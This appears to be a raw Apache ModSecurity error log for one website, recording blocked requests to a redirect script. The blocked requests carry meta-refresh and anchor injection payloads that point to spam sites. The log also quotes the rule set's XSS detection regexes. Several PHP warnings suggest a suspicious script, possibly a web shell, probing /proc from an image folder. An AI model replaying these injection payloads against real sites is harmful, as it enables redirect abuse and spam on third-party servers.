"agKr3hs7kySIUZ3ORnI4igAAAQI"]
[Tue May 12 06:26:06.440141 2026] [security2:error] [pid 1842385:tid 1842392] [client 34.202.88.37:64549] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/camarasexlive.com"] [unique_id "agKr3hs7kySIUZ3ORnI4igAAAQI"]
[Tue May 12 06:26:06.440380 2026] [security2:error] [pid 1842385:tid 1842392] [client 34.202.88.37:64549] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/camarasexlive.com"] [unique_id "agKr3hs7kySIUZ3ORnI4igAAAQI"]
PHP Warning:  filesize(): stat failed for /proc/349/task/349/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/349/task/349/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/349/task/349/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/349/task/349/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/349/task/349/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/349/task/349/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:26:51.157557 2026] [ssl:error] [pid 1825287:tid 1825310] (EAI 2)Name or service not known: [client 74.7.244.10:43052] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 06:26:51.157589 2026] [ssl:error] [pid 1825287:tid 1825310] AH01941: stapling_renew_response: responder error
[Tue May 12 06:27:18.486077 2026] [security2:error] [pid 1808852:tid 1808862] [client 194.233.64.127:52198] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://timemapper.okfnlabs.org/view?url=http://rlu.ru/5bjkg>source data</a><meta http-equiv=refresh content=0;url=https://timemapper.okfnlabs.org/view?url=http://rlu.ru/5bjkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsJhfeipD4uoG21FpEHAAAAAc"]
[Tue May 12 06:27:18.486505 2026] [security2:error] [pid 1808852:tid 1808862] [client 194.233.64.127:52198] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://https%3a%2f%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg>source Data</a><meta http-equiv=refresh content=0;url=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg /> found within ARGS:url: http://https%3a%2f%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg>source Data</a><meta http-equiv=refresh content=0;url=https://Timemapper.Okfnl..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsJhfeipD4uoG21FpEHAAAAAc"]
[Tue May 12 06:27:18.487642 2026] [security2:error] [pid 1808852:tid 1808862] [client 194.233.64.127:52198] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg /> found within ARGS:url: http://https%3a%2f%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg>source Data</a><meta http-equiv=refresh content=0;url=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsJhfeipD4uoG21FpEHAAAAAc"]
[Tue May 12 06:27:18.488173 2026] [security2:error] [pid 1808852:tid 1808862] [client 194.233.64.127:52198] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://https%3a%2f%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg>source Data</a><meta http-equiv=refresh content=0;url=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [ta [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsJhfeipD4uoG21FpEHAAAAAc"]
[Tue May 12 06:27:18.488362 2026] [security2:error] [pid 1808852:tid 1808862] [client 194.233.64.127:52198] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://https%3a%2f%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg>source Data</a><meta http-equiv=refresh content=0;url=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPE [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsJhfeipD4uoG21FpEHAAAAAc"]
[Tue May 12 06:27:18.488759 2026] [security2:error] [pid 1808852:tid 1808862] [client 194.233.64.127:52198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsJhfeipD4uoG21FpEHAAAAAc"]
[Tue May 12 06:27:18.489032 2026] [security2:error] [pid 1808852:tid 1808862] [client 194.233.64.127:52198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsJhfeipD4uoG21FpEHAAAAAc"]
[Tue May 12 06:27:19.122665 2026] [security2:error] [pid 1842385:tid 1842392] [client 194.233.64.127:52209] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://timemapper.okfnlabs.org/view?url=http://rlu.ru/5bjkg>source data</a><meta http-equiv=refresh content=0;url=https://timemapper.okfnlabs.org/view?url=http://rlu.ru/5bjkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsJxs7kySIUZ3ORnI40gAAAQI"]
[Tue May 12 06:27:19.123100 2026] [security2:error] [pid 1842385:tid 1842392] [client 194.233.64.127:52209] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://https%3a%2f%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg>source Data</a><meta http-equiv=refresh content=0;url=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg /> found within ARGS:url: http://https%3a%2f%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg>source Data</a><meta http-equiv=refresh content=0;url=https://Timemapper.Okfnl..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsJxs7kySIUZ3ORnI40gAAAQI"]
[Tue May 12 06:27:19.123276 2026] [security2:error] [pid 1842385:tid 1842392] [client 194.233.64.127:52209] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg /> found within ARGS:url: http://https%3a%2f%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg>source Data</a><meta http-equiv=refresh content=0;url=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsJxs7kySIUZ3ORnI40gAAAQI"]
[Tue May 12 06:27:19.123384 2026] [security2:error] [pid 1842385:tid 1842392] [client 194.233.64.127:52209] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://https%3a%2f%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg>source Data</a><meta http-equiv=refresh content=0;url=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [ta [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsJxs7kySIUZ3ORnI40gAAAQI"]
[Tue May 12 06:27:19.123556 2026] [security2:error] [pid 1842385:tid 1842392] [client 194.233.64.127:52209] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://https%3a%2f%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg>source Data</a><meta http-equiv=refresh content=0;url=https://Timemapper.Okfnlabs.org/view?url=http://Rlu.ru/5bJkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPE [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsJxs7kySIUZ3ORnI40gAAAQI"]
[Tue May 12 06:27:19.123982 2026] [security2:error] [pid 1842385:tid 1842392] [client 194.233.64.127:52209] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsJxs7kySIUZ3ORnI40gAAAQI"]
[Tue May 12 06:27:19.124270 2026] [security2:error] [pid 1842385:tid 1842392] [client 194.233.64.127:52209] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsJxs7kySIUZ3ORnI40gAAAQI"]
[Tue May 12 06:27:19.927719 2026] [ssl:error] [pid 1820198:tid 1820200] (EAI 2)Name or service not known: [client 192.178.6.8:42428] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 06:27:19.927754 2026] [ssl:error] [pid 1820198:tid 1820200] AH01941: stapling_renew_response: responder error
[Tue May 12 06:27:22.397117 2026] [security2:error] [pid 1825287:tid 1825322] [client 27.78.84.116:59524] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsKggpmE1yW0glLdg_ogAAANE"]
[Tue May 12 06:27:22.397520 2026] [security2:error] [pid 1825287:tid 1825322] [client 27.78.84.116:59524] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh c..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsKggpmE1yW0glLdg_ogAAANE"]
[Tue May 12 06:27:22.397677 2026] [security2:error] [pid 1825287:tid 1825322] [client 27.78.84.116:59524] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsKggpmE1yW0glLdg_ogAAANE"]
[Tue May 12 06:27:22.397775 2026] [security2:error] [pid 1825287:tid 1825322] [client 27.78.84.116:59524] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsKggpmE1yW0glLdg_ogAAANE"]
[Tue May 12 06:27:22.397956 2026] [security2:error] [pid 1825287:tid 1825322] [client 27.78.84.116:59524] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsKggpmE1yW0glLdg_ogAAANE"]
[Tue May 12 06:27:22.398426 2026] [security2:error] [pid 1825287:tid 1825322] [client 27.78.84.116:59524] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsKggpmE1yW0glLdg_ogAAANE"]
[Tue May 12 06:27:22.398681 2026] [security2:error] [pid 1825287:tid 1825322] [client 27.78.84.116:59524] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsKggpmE1yW0glLdg_ogAAANE"]
